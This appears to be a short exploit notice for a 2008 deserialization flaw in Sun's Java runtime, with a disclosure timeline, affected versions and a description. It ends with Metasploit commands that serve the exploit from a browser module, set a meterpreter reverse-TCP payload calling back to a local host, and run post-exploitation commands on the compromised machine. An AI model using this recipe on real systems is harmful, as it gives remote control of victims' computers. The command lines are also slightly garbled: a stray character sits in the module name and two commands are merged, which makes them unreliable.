Timeline :
Vulnerability reported by Sami Koivu the 2008-08-01
Vulnerability fixed by Sun the 2008-12-03
PoC provided the 2009-05-19
Metasploit PoC provided by hdm the 2009-06-16
PoC provided by :
Sami Koivu
sf
hdm
Reference(s) :
Affected version(s) :
JRE & JDK version 6 prior to update 11
JRE & JDK version 5 prior to update 16
JRE & JDK version 1.4.2_18 and prior
Tested on Windows XP SP3 with :
Java 6 Standard Edition Update 10
Description :
This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM. The payload can be either a native payload which is generated as an executable and dropped/executed on the target or a shell from within the Java applet in the target browser. The affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16 and earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected).
Commands :
use exploit/multi/browser/java_calendar_deseĀrialize
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploitsessions -i 1
sysinfo
getuid
ipconfig